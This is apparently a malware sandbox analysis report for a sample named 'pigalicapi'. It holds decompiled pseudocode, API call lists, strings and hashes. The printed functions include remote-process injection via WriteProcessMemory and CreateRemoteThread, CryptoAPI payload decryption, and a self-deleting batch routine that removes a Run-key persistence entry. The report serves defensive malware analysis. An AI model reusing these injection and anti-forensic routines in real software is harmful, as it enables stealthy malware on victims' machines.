Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2bd1cefeceeada203d1a88774c59cc1db89744ccd2cbebff13c81639432a2fb
Instruction ID: 7064b4f85ec8c943a007a1c63ca079293348c6aff3994ae5daf0d86751bc83bd
Opcode Fuzzy Hash: a2bd1cefeceeada203d1a88774c59cc1db89744ccd2cbebff13c81639432a2fb
Instruction Fuzzy Hash: D6310AB4A00705CFDB10EFAAD4405DEBBF4EF88354B00892AE956D7711E738A945CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004111D0 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E004111D0(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v32;
				char* _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t16;
				char* _t18;
				intOrPtr* _t36;
				intOrPtr _t41;
				char* _t42;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t47;
				intOrPtr* _t48;

				_t37 = __ecx;
				_t16 = 0x16;
				_t48 = _t47 - 0x2c;
				_t36 = _a4;
				_t41 =  *_t36;
				if(_a8 != 0) {
					_t16 = 0;
					if(_t41 != 1) {
						_t18 = E0040F1C0(_t36, __ecx);
						_t3 = _t18 + 4; // 0x4
						_t46 = _t3;
						_t42 = _t18;
						 *_t48 = _t46;
						E00413FD0();
						_t44 =  *_t36;
						if(_t44 == 0) {
							_v40 = 0x40f4b0;
							_v36 = _t42;
							_t9 = E004102F0(_t36, _t37, _t41, _t42, _t44) + 0xc; // 0xc
							_t22 =  ==  ? _t44 : _t9;
							_t23 =  *((intOrPtr*)( ==  ? _t44 : _t9));
							_v32 =  *((intOrPtr*)( ==  ? _t44 : _t9));
							asm("mfence");
							_t11 = E004102F0(_t36, _t9, _t41, _t42, _t44) + 0xc; // 0xc
							_t26 =  ==  ? _t44 : _t11;
							 *((intOrPtr*)( ==  ? _t44 : _t11)) =  &_v40;
							asm("mfence");
							_a8();
							_t14 = E004102F0(_t36,  &_v40, _t41, _t42, _t44) + 0xc; // 0xc
							_t37 = _t14;
							_t45 =  !=  ? _t14 : _t44;
							 *((intOrPtr*)( !=  ? _t14 : _t44)) = _v32;
							 *_t36 = 1;
						} else {
							if(_t44 != 1) {
								_v48 = _t44;
								_v52 = _t36;
								_v56 = " once %p is %d\n";
								 *_t48 = __imp___iob + 0x40;
								fprintf(??, ??);
							}
						}
						 *_t48 = _t46;
						E00413A00(_t37);
						E0040F340(_t42);
						_t16 = 0;
					}
				}
				return _t16;
			}

APIs

fprintf.MSVCRT ref: 0041122B

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: fprintf
String ID:
API String ID: 383729395-0
Opcode ID: c49ccb3d0ebc46086aea4aed49afa7b442f6277188816013a479267d00939ec4
Instruction ID: 9d1d22da725d0359cd3540e7da02749fe6b1af8f46904c09d6a95be390009998
Opcode Fuzzy Hash: c49ccb3d0ebc46086aea4aed49afa7b442f6277188816013a479267d00939ec4
Instruction Fuzzy Hash: 08219F716142108FC354EF2AC88569BB7E4EF88750F05886EF948DB311D738EC85CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCC9 Relevance: 1.5, APIs: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00414330: strlen.NTDLL ref: 0041433F
Part of subcall function 00414330: memcpy.NTDLL ref: 0041438D
Part of subcall function 00414330: CreateMutexA.KERNEL32 ref: 004143F5
Part of subcall function 00414330: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040F2D5), ref: 00414410
Part of subcall function 00414330: FindAtomA.KERNEL32 ref: 00414421
Part of subcall function 00414330: malloc.MSVCRT ref: 00414439
Part of subcall function 00414330: AddAtomA.KERNEL32 ref: 00414463
Part of subcall function 00414330: free.MSVCRT ref: 0041448D
Part of subcall function 00414330: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414495
Part of subcall function 00414330: CloseHandle.KERNEL32 ref: 004144A1

TlsAlloc.KERNEL32(?,?,?,?,00A52548,004102E5,?,?,FFFFFFFF,0041032C), ref: 0040FCAE

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: AtomMutex$AllocCloseCreateFindHandleObjectReleaseSingleWaitfreemallocmemcpystrlen
String ID:
API String ID: 3969912963-0
Opcode ID: b1339874b04510f9f22b793b8af731fe632baa0263795f962cb2177b771d1822
Instruction ID: 08ba11220197d5884c5fb90774ff7199050f09fd8405595aaced9661a87e5e57
Opcode Fuzzy Hash: b1339874b04510f9f22b793b8af731fe632baa0263795f962cb2177b771d1822
Instruction Fuzzy Hash: 95E0DFF0204301DFC7309F66E80430677E0BB48304F54893EE8AA973A0D778540ACB8E

Uniqueness

Uniqueness Score: -1.00%

Function 10001840 Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 10001848

Memory Dump Source

Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
Instruction ID: e5a886dd6f7ca33b6e05a63634625ffd61cc9a463d586fd81315a615fd3f2724
Opcode Fuzzy Hash: d16f793e14d30ae703a09ad83dbe3b7ccdd5b75166227a635d2c9c6bbfe82863
Instruction Fuzzy Hash: EBD09274A0620CEBDB10DBA9D948A8EB7FDEB08291F108598E90997204DA31AF409B90

Uniqueness

Uniqueness Score: -1.00%

Function 100019F0 Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,10001A51,00003000,00000004,000000BE,?,10001A51,?), ref: 10001A01

Memory Dump Source

Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
Instruction ID: cb2b1c577f6c2eb629580bdbf47f529d576ce8939b3be3f1cb066eb9375a85c4
Opcode Fuzzy Hash: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
Instruction Fuzzy Hash: 59D0C9B4685208BBE710CB84CC56F6ABBACD704751F004185FE089B280D5B1AE0056A1

Uniqueness

Uniqueness Score: -1.00%

Function 10001820 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 1000182F

Memory Dump Source

Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
Instruction ID: 84b35084efcff6c5970382eaf3cd32c1c52104bf155538fafba3cb0c341aa3c2
Opcode Fuzzy Hash: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
Instruction Fuzzy Hash: E8C04C7611430CABCB04DF98DC94DAB37ADBB8C650B04C508FA1D87204C630F9108BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 024E8CF0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 96
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E024E8CF0(BYTE* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
				int _v8;
				long* _v12;
				int _v16;
				char _v20;
				long* _v24;
				char* _t31;
				int _t32;
				intOrPtr _t34;
				long** _t35;
				char* _t52;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					L15:
					return _v8;
				} else {
					_v12 = 0;
					_t31 =  *0x24f3370; // 0x24ec6e4
					_t32 = CryptAcquireContextA( &_v12, _t31, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
					if(_t32 == 0) {
						_t32 = GetLastError();
						_v16 = _t32;
						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
							_t52 =  *0x24f3370; // 0x24ec6e4
							_t32 = CryptAcquireContextA( &_v12, _t52, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
						}
					}
					if(_v12 != 0) {
						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
						if(_t32 != 0) {
							_t34 = _a16;
							__imp__CryptHashData(_v20, _a12, _t34, 0);
							if(_t34 != 0) {
								_v24 = 0;
								_t35 =  &_v24;
								__imp__CryptDeriveKey(_v12, 0x6801, _v20, 1, _t35);
								if(_t35 != 0) {
									_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
									CryptDestroyKey(_v24);
								}
							}
							__imp__CryptDestroyHash(_v20);
						}
						CryptReleaseContext(_v12, 0);
					}
					goto L15;
				}
			}

0x024e8cf6
0x024e8d01
0x024e8e1a
0x024e8e20
0x024e8d25
0x024e8d25
0x024e8d35
0x024e8d3f
0x024e8d47
0x024e8d49
0x024e8d4f
0x024e8d59
0x024e8d6d
0x024e8d78
0x024e8d78
0x024e8d59
0x024e8d82
0x024e8d99
0x024e8da1
0x024e8da5
0x024e8db1
0x024e8db9
0x024e8dbb
0x024e8dc2
0x024e8dd5
0x024e8ddd
0x024e8df7
0x024e8dfe
0x024e8dfe
0x024e8ddd
0x024e8e08
0x024e8e08
0x024e8e14
0x024e8e14
0x00000000
0x024e8d82

APIs

CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8D3F
GetLastError.KERNEL32 ref: 024E8D49
CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8D78
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E8D99
CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 024E8DB1
CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 024E8DD5
CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 024E8DF1
CryptDestroyKey.ADVAPI32(00000000), ref: 024E8DFE
CryptDestroyHash.ADVAPI32(00000000), ref: 024E8E08
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8E14

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8D30
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8D68

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 3718126946-947817771
Opcode ID: be5592fb3733d1aefc7fd088b7bd7826e3d9de02afa658acf6217aa3026c2298
Instruction ID: 61b9d67de264f9f6bec297fd92e1c461c96095195416f335239ffa4b95a423c3
Opcode Fuzzy Hash: be5592fb3733d1aefc7fd088b7bd7826e3d9de02afa658acf6217aa3026c2298
Instruction Fuzzy Hash: 82311E75A80209EBFF14DFD4C989FAF7779BB44706F10851AF602AA280C7B49950CF60

Uniqueness

Uniqueness Score: -1.00%

Function 024E2510 Relevance: 12.1, APIs: 8, Instructions: 149
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E2510(void* _a4, intOrPtr _a8) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long _v28;
				void* _v32;
				signed int _v36;
				void* _t138;
				void* _t139;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0) {
					L14:
					return _v8;
				} else {
					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
					_v12 =  *((intOrPtr*)(_v24 + 0x50));
					_v16 = VirtualAlloc(0, _v12, 0x3000, 0x40);
					if(_v16 != 0) {
						_v32 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40);
						if(_v32 != 0) {
							L7:
							E024E7B70(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
							_t139 = _t138 + 0xc;
							_v36 = 0;
							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
								E024E7B70(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
								_t139 = _t139 + 0xc;
								_v36 = _v36 + 1;
							}
							E024E26D0(_v16, _v32);
							if(WriteProcessMemory(_a4, _v32, _v16, _v12, 0) != 0) {
								VirtualFree(_v16, 0, 0x8000);
								_v28 = 0;
								_v8 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28);
								goto L14;
							}
							VirtualFree(_v16, 0, 0x8000);
							return 0;
						}
						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
						if(_v32 != 0) {
							goto L7;
						}
						VirtualFree(_v16, 0, 0x8000);
						return 0;
					}
					return 0;
				}
			}

0x024e2516
0x024e2521
0x024e26c2
0x00000000
0x024e2531
0x024e253a
0x024e254b
0x024e2554
0x024e256a
0x024e2571
0x024e2596
0x024e259d
0x024e25d7
0x024e25e6
0x024e25eb
0x024e25ee
0x024e2600
0x024e263c
0x024e2641
0x024e25fd
0x024e25fd
0x024e264e
0x024e2670
0x024e2692
0x024e2698
0x024e26bf
0x00000000
0x024e26bf
0x024e267d
0x00000000
0x024e2683
0x024e25b6
0x024e25bd
0x00000000
0x00000000
0x024e25ca
0x00000000
0x024e25d0
0x00000000
0x024e2573

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 024E2564
VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 024E2590
VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 024E25B0
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E25CA

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Virtual$Alloc$Free
String ID:
API String ID: 3668210933-0
Opcode ID: d1426ed85dea1b80a2d87683ddc20e304a9fca7b94a744c756eec17a22ef716e
Instruction ID: e98d7bc8285e863676a7fe4831043c6aa477e104ddbefb11413a7fcff4c5d773
Opcode Fuzzy Hash: d1426ed85dea1b80a2d87683ddc20e304a9fca7b94a744c756eec17a22ef716e
Instruction Fuzzy Hash: 23510CB5E40209EFEF08CF94C895FAEB7B9BF48705F108549E915AB281D774A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4FC Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040D54F
UnhandledExceptionFilter.KERNEL32 ref: 0040D55F
GetCurrentProcess.KERNEL32 ref: 0040D568
TerminateProcess.KERNEL32 ref: 0040D579
abort.MSVCRT ref: 0040D582

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: fd9db7f0874483d10b200add315514f979aa86a3b60fb29af93f5c95035f5732
Instruction ID: 9824e27efd6e7c83b31d16d0cbecc9548462bee31ea0de24143adee51b232729
Opcode Fuzzy Hash: fd9db7f0874483d10b200add315514f979aa86a3b60fb29af93f5c95035f5732
Instruction Fuzzy Hash: 8901ACB4A04304DFD710EF79EA495597BF0FB04304F818939ED9997220E7B45556CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D500 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040D54F
UnhandledExceptionFilter.KERNEL32 ref: 0040D55F
GetCurrentProcess.KERNEL32 ref: 0040D568
TerminateProcess.KERNEL32 ref: 0040D579
abort.MSVCRT ref: 0040D582

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: dc419f05c78df07fc1028f6fa8ebfa857d173d53209bdf56c34a1317ca656444
Instruction ID: 01619bb876d6b6a6ce0892675db8caf066cd75de0a22c9d772086659f3caa19f
Opcode Fuzzy Hash: dc419f05c78df07fc1028f6fa8ebfa857d173d53209bdf56c34a1317ca656444
Instruction Fuzzy Hash: F701A8B4A04304DFD710EF7AEA495597BF0FB04304F818A39ED8997220E7B85556CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 024E74A0 Relevance: 56.2, APIs: 24, Strings: 8, Instructions: 195
stringregistryfileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E024E74A0() {
				char _v524;
				CHAR* _v528;
				void* _v532;
				void* _v536;
				void* _v540;
				char _v1060;
				char _v1580;
				char _v2364;
				long _v2368;
				struct _PROCESS_INFORMATION _v2384;
				long _v2388;
				struct _STARTUPINFOA _v2460;
				void* _t86;
				void* _t121;
				void* _t123;
				void* _t124;

				E024E7D20(E024E7D20( &_v2364,  &_v2364, 0, 0x30c),  &_v1060, 0, 0x208);
				_t123 = _t121 + 0x18;
				 *0x24f4370 = 1;
				Sleep(0x3e8);
				if(( *0x24f4362 & 0x000000ff) != 0) {
					_v2368 = 0x207;
					if(( *0x24f435a & 0x000000ff) == 0) {
						GetEnvironmentVariableA("USERPROFILE",  &_v1060, 0x207);
					} else {
						__imp__GetAllUsersProfileDirectoryA( &_v1060,  &_v2368);
					}
					lstrcatA( &_v1060, "\\");
					lstrcatA( &_v1060, "pigalicapi");
					lstrcatA( &_v1060, ".exe");
				} else {
					GetModuleFileNameA(0,  &_v1060, 0x207);
				}
				SetFileAttributesA( &_v1060, 0x80);
				wnsprintfA( &_v2364, 0x30b, ":repeat\r\ndel %s\r\nif exist %s goto :repeat\r\ndel %%0",  &_v1060,  &_v1060);
				_t124 = _t123 + 0x14;
				if( *0x24f436c != 0) {
					_t86 =  *0x24f436c; // 0x2ec
					TerminateThread(_t86, 1);
				}
				_v528 = "software\\microsoft\\windows\\currentversion\\run";
				_v532 = 0x80000001;
				if(( *0x24f435a & 0x000000ff) != 0) {
					_v532 = 0x80000002;
				}
				_v536 = 0;
				if(RegOpenKeyExA(_v532, _v528, 0, 2,  &_v536) == 0) {
					RegDeleteValueA(_v536, "pigalicapi");
					RegCloseKey(_v536);
				}
				if(( *0x24f435b & 0x000000ff) != 0) {
					E024E5E30(1);
					_t124 = _t124 + 4;
				}
				GetEnvironmentVariableA("TEMP",  &_v1580, 0x104);
				GetTempFileNameA( &_v1580, "slf", GetTickCount() % 0xffff,  &_v524);
				lstrcatA( &_v524, ".bat");
				_t71 = CreateFileA( &_v524, 0x40000000, 1, 0, 2, 0, 0);
				_v540 = _t71;
				if(_v540 != 0xffffffff) {
					_v2388 = 0;
					WriteFile(_v540,  &_v2364, lstrlenA( &_v2364),  &_v2388, 0);
					E024E7D20(E024E7D20(CloseHandle(_v540),  &_v2384, 0, 0x10),  &_v2460, 0, 0x44);
					_v2460.cb = 0x44;
					_v2460.dwFlags = _v2460.dwFlags | 0x00000001;
					_v2460.wShowWindow = 0;
					if(CreateProcessA(0,  &_v524, 0, 0, 0, 0, 0, 0,  &_v2460,  &_v2384) != 0) {
						_t71 = CloseHandle(_v2384.hThread);
					}
					ExitProcess(0);
				}
				return _t71;
			}

0x024e74cd
0x024e74d2
0x024e74d5
0x024e74e4
0x024e74f3
0x024e750b
0x024e751e
0x024e7547
0x024e7520
0x024e752e
0x024e752e
0x024e7559
0x024e756b
0x024e757d
0x024e74f5
0x024e7503
0x024e7503
0x024e758f
0x024e75b4
0x024e75ba
0x024e75c4
0x024e75c8
0x024e75ce
0x024e75ce
0x024e75d4
0x024e75de
0x024e75f1
0x024e75f3
0x024e75f3
0x024e75fd
0x024e7628
0x024e7636
0x024e7643
0x024e7643
0x024e7652
0x024e7656
0x024e765b
0x024e765b
0x024e766f
0x024e7698
0x024e76aa
0x024e76c6
0x024e76cc
0x024e76d9
0x024e76df
0x024e770e
0x024e773f
0x024e7747
0x024e775a
0x024e7762
0x024e7794
0x024e779d
0x024e779d
0x024e77a5
0x024e77a5
0x024e77ae

APIs

Sleep.KERNEL32(000003E8), ref: 024E74E4
GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 024E7503
GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 024E752E
lstrcatA.KERNEL32(?,024EC650), ref: 024E7559
lstrcatA.KERNEL32(?,pigalicapi), ref: 024E756B
lstrcatA.KERNEL32(?,.exe), ref: 024E757D
SetFileAttributesA.KERNEL32(?,00000080), ref: 024E758F
wnsprintfA.SHLWAPI ref: 024E75B4
TerminateThread.KERNEL32(000002EC,00000001), ref: 024E75CE
RegOpenKeyExA.ADVAPI32(80000001,024EC690,00000000,00000002,00000000), ref: 024E7620
RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 024E7636
RegCloseKey.ADVAPI32(00000000), ref: 024E7643
GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 024E766F
GetTickCount.KERNEL32 ref: 024E767C
GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 024E7698
lstrcatA.KERNEL32(?,.bat), ref: 024E76AA
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 024E76C6
lstrlenA.KERNEL32(?,00000000,00000000), ref: 024E76F9
WriteFile.KERNEL32(000000FF,?,00000000), ref: 024E770E
CloseHandle.KERNEL32(000000FF), ref: 024E771B
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 024E778C
CloseHandle.KERNEL32(?), ref: 024E779D
ExitProcess.KERNEL32 ref: 024E77A5

Strings

TEMP, xrefs: 024E766A
:repeatdel %sif exist %s goto :repeatdel %%0, xrefs: 024E75A3
.bat, xrefs: 024E769E
pigalicapi, xrefs: 024E755F, 024E762A
USERPROFILE, xrefs: 024E7542
D, xrefs: 024E7747
.exe, xrefs: 024E7571
slf, xrefs: 024E768C

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf
API String ID: 3221898725-336785456
Opcode ID: 0af1d8a2977741d3b11839dc8ac6c0b49b4361d4bbceaab56c6db5e7dd1f7488
Instruction ID: 8d6efd7f7dc05c84430c69b8b448459f2845102230bf1f0d391c4e3a8982317d
Opcode Fuzzy Hash: 0af1d8a2977741d3b11839dc8ac6c0b49b4361d4bbceaab56c6db5e7dd1f7488
